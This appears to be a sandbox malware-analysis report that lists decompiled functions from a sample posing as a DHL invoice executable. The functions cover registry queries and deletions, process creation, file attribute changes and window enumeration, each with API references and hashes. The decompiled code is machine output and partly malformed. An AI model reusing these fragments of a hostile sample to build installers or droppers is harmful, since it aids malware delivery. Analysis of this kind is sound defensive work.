API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: ddf2a152624567bc35da4541f44a776fb725d0fa8b0c85df1340a4960263d5a3
Instruction ID: 04bb7c48cbe751177dc28835b657b3cbdb2e0b57b60725b91cc1122e32421e69
Opcode Fuzzy Hash: ddf2a152624567bc35da4541f44a776fb725d0fa8b0c85df1340a4960263d5a3
Instruction Fuzzy Hash: 1841D23241024AAFEFA0DFE8D974BDA37ECBB81314F40443AF8589A185DB77958CC659

Uniqueness

Uniqueness Score: -1.00%

Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004027B0(short* __edi, void* __ebp, void* _a12, void* _a52, void* _a76) {
				void* _t8;
				void* _t15;
				void* _t18;
				void* _t27;

				_t8 = E004030C1(_t15, _t18, _t27, 0x20019); // executed
				E00403002(3);
				 *__edi = 0;
				if(_t8 != 0) {
					__ecx = 0x3ff;
					 *(__esp + 0x50) = 0x3ff;
					__eflags =  *((intOrPtr*)(__esp + 0x38)) - __ebp;
					if( *((intOrPtr*)(__esp + 0x38)) == __ebp) {
						__ecx = __esp + 0x60;
						__eax = RegEnumValueW(__esi, __eax, __edi, __esp + 0x60, __ebp, __ebp, __ebp, __ebp);
						0 = 1;
						__eflags = __eax;
						 *((intOrPtr*)(__esp + 0x10)) = __ebx;
					} else {
						__eax = RegEnumKeyW(__esi, __eax, __edi, 0x3ff);
					}
					__eax = 0;
					__edi[0x3ff] = __ax;
					__eax = RegCloseKey(__esi);
					__ebx =  *((intOrPtr*)(__esp + 0x10));
				}
				 *0x435ac8 =  *0x435ac8 + 1;
				return 0;
			}

0x004027b5
0x004027be
0x004027ca
0x004027cf
0x004027d5
0x004027da
0x004027de
0x004027e2
0x004027f4
0x004027fc
0x00402804
0x00402805
0x0040280a
0x004027e4
0x004027e8
0x004027e8
0x0040280e
0x00402811
0x00402818
0x00402ea1
0x00402ea1
0x00402ea5
0x00402eb7

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: b46cacae281d1184c7c84bd9f72f61e273c768f7e9ccf463ebf68afd38743971
Instruction ID: 15f2e51ca923653d163ef63657e7ddfb51ce7db4af5690b84a8befcbfff3b97a
Opcode Fuzzy Hash: b46cacae281d1184c7c84bd9f72f61e273c768f7e9ccf463ebf68afd38743971
Instruction Fuzzy Hash: 9301B531658341ABD3189F61EC88D3BB7ACFF85315F10093EF542E2181D7B86900876A

Uniqueness

Uniqueness Score: -1.00%

Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402728(short* __edi, void* _a20, void* _a48, void* _a72) {
				int* __ebp;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t28;

				_t12 = E004030C1(_t18, _t20, _t28, 0x20019); // executed
				E0040303E(_t20, 0x33);
				 *__edi = 0;
				if(_t12 != 0) {
					__ecx = __esp + 0x50;
					 *(__esp + 0x50) = 0x800;
					__ecx = __esp + 0x24;
					__eax = RegQueryValueExW(__esi, __eax, __ebp, __esp + 0x24, __edi, __esp + 0x50); // executed
					0 = 1;
					__eflags = __eax;
					if(__eax != 0) {
						L9:
						__eax = 0;
						 *__edi = __ax;
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 4;
						if( *((intOrPtr*)(__esp + 0x1c)) == 4) {
							__eflags =  *(__esp + 0x3c);
							__eax = E0040661F(__edi,  *__edi);
							goto L2;
						} else {
							__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 1;
							if( *((intOrPtr*)(__esp + 0x1c)) == 1) {
								L7:
								__eax = 0;
								__edi[0x7fe] = __ax;
								L2:
								__eax = RegCloseKey(__esi); // executed
								goto L10;
							} else {
								__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 2;
								if( *((intOrPtr*)(__esp + 0x1c)) != 2) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
					L11:
					return 0;
				}
				L10:
				 *0x435ac8 =  *0x435ac8 + 1;
				goto L11;
			}

0x0040272d
0x00402736
0x0040273d
0x00402742
0x00402748
0x0040274c
0x00402756
0x0040275e
0x00402766
0x00402767
0x00402769
0x004027a4
0x004027a4
0x004027a8
0x00000000
0x0040276b
0x0040276b
0x00402770
0x00402792
0x0040279a
0x00000000
0x00402772
0x00402772
0x00402776
0x0040277f
0x00402783
0x00402785
0x0040271c
0x0040271d
0x00000000
0x00402778
0x00402778
0x0040277d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040277d
0x00402776
0x00402770
0x00402eab
0x00402eb7
0x00402eb7
0x00402ea5
0x00402ea5
0x00000000

APIs

RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp,?,?,00000011,00000002), ref: 0040271D
RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040275E

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 4cd1d9cc3bf1777f8ea3db62a511f2da858761b9b4148003de5ccdbbc2434c8c
Instruction ID: fb228a38f7146265a3f721d89abc8bf78f6fe6bd0b338e84b9d16a0e51430f88
Opcode Fuzzy Hash: 4cd1d9cc3bf1777f8ea3db62a511f2da858761b9b4148003de5ccdbbc2434c8c
Instruction Fuzzy Hash: 5C11C235658302AFD7149FA4D98863BB3A4EF84315F10093FF102A21D1D7B85909CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401399(signed int _a4) {
				signed int _t10;
				int _t12;
				void* _t16;
				signed int _t17;
				void* _t18;
				signed int _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 < 0) {
					L10:
					return 0;
				}
				while(1) {
					_t6 =  *0x435a30 + _t20 * 0x1c;
					if( *((intOrPtr*)( *0x435a30 + _t20 * 0x1c)) == 1) {
						goto L10;
					}
					if(E0040154A(_t6) == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t16 = E004030FD(_t7);
					if(_t16 != 0) {
						_t17 = _t16 - 1;
						_t10 = _t20;
						_t20 = _t17;
						_t18 = _t17 - _t10;
					} else {
						_t18 = _t16 + 1;
						_t20 = _t20 + 1;
					}
					if( *((intOrPtr*)(_t21 + 0x10)) != 0) {
						_t12 =  *0x4349d0 + _t18;
						 *0x4349d0 = _t12;
						SendMessageW( *(_t21 + 0x1c), 0x402, MulDiv(_t12, 0x7530,  *0x4349cc), 0); // executed
					}
					if(_t20 >= 0) {
						continue;
					} else {
						goto L10;
					}
				}
				goto L10;
			}

0x0040139a
0x004013a1
0x00401413
0x00000000
0x00401413
0x004013a8
0x004013b0
0x004013b5
0x00000000
0x00000000
0x004013bf
0x00000000
0x0040141a
0x004013c7
0x004013cb
0x004013d1
0x004013d2
0x004013d4
0x004013d6
0x004013cd
0x004013cd
0x004013ce
0x004013ce
0x004013dd
0x004013ec
0x004013f4
0x00401409
0x00401409
0x00401411
0x00000000
0x00000000
0x00000000
0x00000000
0x00401411
0x00000000

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
Instruction ID: 538a9e804dfe71f8462b772bc95ac31ea7b37d3b99b6caf0eca62282663b68d4
Opcode Fuzzy Hash: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
Instruction Fuzzy Hash: 4701D472A152309BD7196F28AC09B6B3699AB80711F15453AF901F72F1D2B89C018758

Uniqueness

Uniqueness Score: -1.00%

Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025FF(void* __ebp, signed int _a52, intOrPtr _a56, intOrPtr _a60) {
				void* _t9;
				signed int _t14;
				void* _t16;
				void* _t20;
				long _t22;
				void* _t25;

				_t22 = 1;
				_t30 = _a56 - __ebp;
				if(_a56 != __ebp) {
					_t22 = E0040307C(_a60, E0040303E(_t20, 0x22), _a52 >> 1);
				} else {
					_t9 = E004030C1(_t16, _t20, _t30, 2); // executed
					_t25 = _t9;
					if(_t25 != 0) {
						_t22 = RegDeleteValueW(_t25, E0040303E(_t20, 0x33));
						RegCloseKey(_t25);
					}
				}
				_t14 = 0 | _t22 != 0x00000000;
				 *0x435ac8 =  *0x435ac8 + _t14;
				return 0;
			}

0x00402601
0x00402602
0x00402606
0x00402648
0x00402608
0x0040260a
0x0040260f
0x00402613
0x00402625
0x00402627
0x00402627
0x00402613
0x0040264e
0x00402ea5
0x00402eb7

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
RegCloseKey.ADVAPI32(00000000), ref: 00402627

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 7d9b9e65408846c590e7b8876d8f67edd050b095ff447458a8fbe16232e7be29
Instruction ID: 5f348ce6c2db00307db5fd01af11d87f06065e179f09fd272fc5be425d392e88
Opcode Fuzzy Hash: 7d9b9e65408846c590e7b8876d8f67edd050b095ff447458a8fbe16232e7be29
Instruction Fuzzy Hash: 29F02433545601B7E310ABA49C4AA7E766DABD03A2F10053FFA02A61C5CA7E8C42822D

Uniqueness

Uniqueness Score: -1.00%

Function 004066D6 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066D6(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42fd78->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42fd78,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004066dc
0x004066ff
0x00406707
0x0040670c
0x00000000
0x00406712
0x00406716

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FD78,?), ref: 004066FF
CloseHandle.KERNEL32(?), ref: 0040670C

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 56b83460f623c560f9136c4b0375a20ff073fe194eb282a2dd1e719b426acf2b
Instruction ID: 0c6c23135c748ad7b6e02b48b863ea359631b5b673f9ca8adb803affa24eb5bb
Opcode Fuzzy Hash: 56b83460f623c560f9136c4b0375a20ff073fe194eb282a2dd1e719b426acf2b
Instruction Fuzzy Hash: F3E04FF0600619BFFB009B64EC09F7B777CEB40204F904435BD11E6151E3749C148A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040691B Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040691B(WCHAR* _a4, long _a8, long _a12) {
				long _t5;
				void* _t7;

				_t5 = GetFileAttributesW(_a4); // executed
				_t6 =  ==  ? 0 : _t5;
				_t7 = CreateFileW(_a4, _a8, "true", 0, _a12,  ==  ? 0 : _t5, 0); // executed
				return _t7;
			}

0x0040691f
0x0040692c
0x0040693f
0x00406945

APIs

GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
Instruction ID: d43685c7aa133134ae341259a1979053aa5ebee8cfee21dedca447a2e346f0f1
Opcode Fuzzy Hash: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
Instruction Fuzzy Hash: 77D09E71218202AEEF055F20DE4AF1FBA65EF84710F104A2CF6A6D40F0D6718C24AA11

Uniqueness

Uniqueness Score: -1.00%

Function 00406B9D Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B9D(WCHAR* _a4) {
				signed int _t3;
				signed int _t8;

				_t3 = GetFileAttributesW(_a4); // executed
				_t8 = _t3;
				if(_t8 != 0xffffffff) {
					SetFileAttributesW(_a4, _t8 & 0xfffffffe);
				}
				return _t8;
			}

0x00406ba2
0x00406ba8
0x00406bad
0x00406bb9
0x00406bb9
0x00406bc2

APIs

GetFileAttributesW.KERNELBASE(?,?,00406591,?,?,00000000,004068AE,?,?,?,?), ref: 00406BA2
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406BB9

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
Instruction ID: 2641cd0fcf7a615d2272f2c652f3c677170a534def33f5957a60d90ba1304b54
Opcode Fuzzy Hash: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
Instruction Fuzzy Hash: 11D0A7712040316BC6042738DC0C45ABA56DB853707018735F9F6A22F1D7300C2186D4

Uniqueness

Uniqueness Score: -1.00%

Function 6EF22D14 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EF22D14(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

				if( *0x6ef25024 != 0 && E6EF21BC1(_a4) == 0) {
					 *0x6ef25030 = _t86;
					if( *0x6ef25034 != 0) {
						_t86 =  *0x6ef25034;
					} else {
						E6EF23250(E6EF21C43());
						 *0x6ef25034 = _t86;
					}
				}
				_t28 = E6EF21C49(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6EF21BBB();
					_t67 = _a4;
					_t74 =  *0x6ef25028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6ef25028 = _t67;
					E6EF21C5A();
					_t33 = EnumWindows(??, ??); // executed
					 *0x6ef25000 = _t33;
					 *0x6ef25004 = _t74;
					if( *0x6ef25024 != 0 && E6EF21BC1( *0x6ef25028) == 0) {
						 *0x6ef25034 = _t87;
						_t87 =  *0x6ef25030;
					}
					_t75 =  *0x6ef25028;
					_a4 = _t75;
					 *0x6ef25028 =  *((intOrPtr*)(E6EF21BBB() + _t75));
					_t37 = E6EF21BAD(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6EF21C49(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6EF21C54() + _a4 + _v8);
							_push(E6EF21C64());
							if( *0x6ef25024 <= 0 || E6EF21BC1(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6ef25034;
								_t76 = _t64 + _t78 * 4;
								 *0x6ef25034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6ef25028 == 0) {
						 *0x6ef25034 = 0;
					}
					_push( *0x6ef25004);
					E6EF22CBF(_t37, _t64, _t76, _a4,  *0x6ef25000);
					return _a4;
				}
				_push(E6EF21C54() + _a4);
				_t53 = E6EF21C60();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6EF21CC3();
				_t80 = E6EF21CBF();
				_t83 = E6EF21C64();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6ef22d24
0x6ef22d35
0x6ef22d42
0x6ef22d56
0x6ef22d44
0x6ef22d49
0x6ef22d4e
0x6ef22d4e
0x6ef22d42
0x6ef22d5f
0x6ef22d64
0x6ef22d6a
0x6ef22dae
0x6ef22dae
0x6ef22db3
0x6ef22db8
0x6ef22dbe
0x6ef22dc0
0x6ef22dc6
0x6ef22dd3
0x6ef22dd5
0x6ef22dda
0x6ef22de7
0x6ef22dfa
0x6ef22e00
0x6ef22e06
0x6ef22e07
0x6ef22e0d
0x6ef22e19
0x6ef22e1f
0x6ef22e27
0x6ef22e28
0x6ef22e2b
0x6ef22e36
0x6ef22e38
0x6ef22e44
0x6ef22e4a
0x6ef22e52
0x6ef22e7e
0x6ef22e7f
0x6ef22e85
0x6ef22e85
0x6ef22e88
0x6ef22e89
0x6ef22e8c
0x6ef22e62
0x6ef22e62
0x6ef22e63
0x6ef22e65
0x6ef22e68
0x6ef22e6e
0x6ef22e71
0x6ef22e77
0x6ef22e7a
0x6ef22e7a
0x6ef22e52
0x6ef22e36
0x6ef22e95
0x6ef22e97
0x6ef22e97
0x6ef22ea1
0x6ef22eb0
0x6ef22ebe
0x6ef22ebe
0x6ef22d75
0x6ef22d76
0x6ef22d7b
0x6ef22d7f
0x6ef22d84
0x6ef22d98
0x6ef22d99
0x6ef22d9a
0x6ef22d9c
0x6ef22da1
0x6ef22da3
0x6ef22da3
0x6ef22da6
0x6ef22dac
0x00000000

APIs

EnumWindows.USER32(?), ref: 6EF22DD3

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 920a7eb096bfef6170c7a19ffa61aa55dfe7fbd641aa5ab99d713d7b360d6b8a
Instruction ID: 92820098077f476c20f3e3693932d2641dc0d1f24f6e61bcc56ec3a797b084e8
Opcode Fuzzy Hash: 920a7eb096bfef6170c7a19ffa61aa55dfe7fbd641aa5ab99d713d7b360d6b8a
Instruction Fuzzy Hash: A941C576920A05AFEF10DFE0DEA0BC937B8EB85328F10487AE504DF218D73695458B86

Uniqueness

Uniqueness Score: -1.00%

Function 00402566 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402566(void* __ecx, WCHAR* __ebp, void* _a12, intOrPtr _a40, intOrPtr _a56) {
				int _t4;
				intOrPtr _t9;
				void* _t13;
				WCHAR* _t14;
				WCHAR* _t16;
				WCHAR* _t18;
				void* _t20;

				_t18 = __ebp;
				_t16 = __ebp;
				_t14 = __ebp;
				if(__ecx != 0) {
					__ebp = E0040303E(__edx, __ebp);
				}
				if(_t4 != 0) {
					_t16 = E0040303E(_t13, 0x11);
				}
				if(_a56 != _t14) {
					_t14 = E0040303E(_t13, 0x22);
				}
				_t4 = WritePrivateProfileStringW(_t18, _t16, _t14, E0040303E(_t13, 0xffffffcd)); // executed
				if(_t4 != 0) {
					_t9 =  *((intOrPtr*)(_t20 + 0x10));
				} else {
					_t9 = 1;
				}
				 *0x435ac8 =  *0x435ac8 + _t9;
				return 0;
			}

0x00402566
0x00402566
0x00402568
0x0040256c
0x00402574
0x00402576
0x0040257c
0x00402585
0x00402585
0x0040258b
0x00402594
0x00402594
0x004025a1
0x00401703
0x00402ea1
0x00401709
